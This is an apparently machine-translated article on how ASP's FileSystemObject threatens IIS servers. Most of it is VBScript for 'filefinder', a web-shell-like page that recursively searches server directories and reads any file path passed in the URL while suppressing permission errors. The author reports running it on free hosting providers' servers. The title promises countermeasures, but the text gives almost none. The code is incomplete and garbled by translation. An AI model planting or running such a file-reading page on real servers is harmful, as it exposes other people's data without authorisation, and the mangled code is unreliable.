Threats to iis web server data security by FSO objects in ASP and Countermeasures

The scripting. filesystemobject object is one of the many com objects provided by scrrun. dll that are controlled by vbscript/jscript. Scripting. filesystemobject provides convenient access to text files and file directories, but it also poses a certain threat to iis web server data security.

The filefinder code is simple. It consists of three functions and 30 lines of sequential code.

The most important thing is the findfiles function. It uses recursive calls to traverse a directory and searches for these files according to the specified file extension.

Function findfiles (strstartfolder, strext)

Dim n

Dim othisfolder

Dim ofolders

Dim ofiles

Dim ofolder

Dim ofile

'If the system administrator has carefully set the permissions of the file system, the following code will go wrong

'But some directories can still be viewed, so we simply ignore the errors.

On error resume next

N = 0

Response. write "<B> searching" & strstartfolder & "</B> <br>"

Set othisfolder = g_fs.getfolder (strstartfolder)

Set ofiles = othisfolder. files

For each ofile in ofiles

'If the file extension is specified, the output connection is directed to itself, but different command cmd is used.

'Here is cmd = read, that is, read the text file in the specified physical path.

If issuffix (ofile. path, strext) then

Response. write "<a target = _ blank href = 'ff. asp? Cmd = read & path = "& server.html encode (ofile. path) & "'> <font color = 'dodgerblue'>" & ofile. path & "</font> </a> <br>"

If err = 0 then

N = n + 1

End if

End if

Next

Set ofolders = othisfolder. subfolders

For each ofolder in ofolders

N = n + findfiles (ofolder. path, strext)

Next

Findfiles = n

End function

The following code analyzes the parameters following the url:

'Read the values of each parameter

Strcmd = ucase (request. querystring ("cmd "))

Strpath = request. querystring ("path ")

Strext = request. querystring ("ext ")

Brawdata = ucase (request. querystring ("raw "))

'Default search for. asp files

If strpath = "" then

Strpath = "."

End if

If strext = "" then

Strext = ". asp"

End if

'Execute different codes according to different command cmd

Select case strcmd

Case "find"

Response. write findfiles (strpath, strext) & "file (s) found"

Case "read"

If brawdata = "t" then

Response. write readtextfile (strpath)

Else

Response. write "<pre>" & server.html encode (readtextfile (strpath) & "</pre>"

End if

Case else

Response. write "

End select

From the above analysis, we can see that if you have sufficient permissions, we can use filefinder to find any text files on the iis web server, and you can easily view the file content. For non-text files, you can determine whether they exist and their paths. This information is sometimes extremely important for advanced hackers.

However, the precondition for these threats to data security is that users who execute ff. asp have at least the permission to read directories and files. Because the default security settings of windows nt server after installation allow all users to "read" directories and files, whether it is your default iis user iusr_servername or another user, can read the Directory and file information along the column. Most windows nt server System Administrators are mainly concerned about whether the system can run. Generally, they are unwilling to change the default directory and file permissions. After all, doing so poses a great risk, it also requires many experiences. Therefore, we can use filefinder to check whether the security settings of the file system of the nt server as the web server are secure.

The author sets the permissions for the file system on the iis web server manually. However, due to lack of experience, many strange errors are caused, such: the nt server 4.0 used in the experiment cannot connect to the access database. These functions are normal before the file system permission is changed.

For purely research purposes, the author also conducted a test on the free asp space I applied for (including my personal homepage provided by csdn). As a result, filefinder can run smoothly. And in the http://www2.domaindlx.com/index.html application of personal home page but there is no this problem, it can be seen that the free asp home page provider in this regard is more serious. Although the domaindlx web server runs on windows 2000 server, its default file system security permissions are not significantly different from nt 4.0.

Due to the limited ability of the author, we will discuss this issue here. This document serves only to provide reference to asp homepage providers in China, hoping to help both providers and customers with data security.

Appendix: use other similar server scripts to run web services. If scripting. filesystemobject is also provided for file system operations, no matter which platform should have the same problem.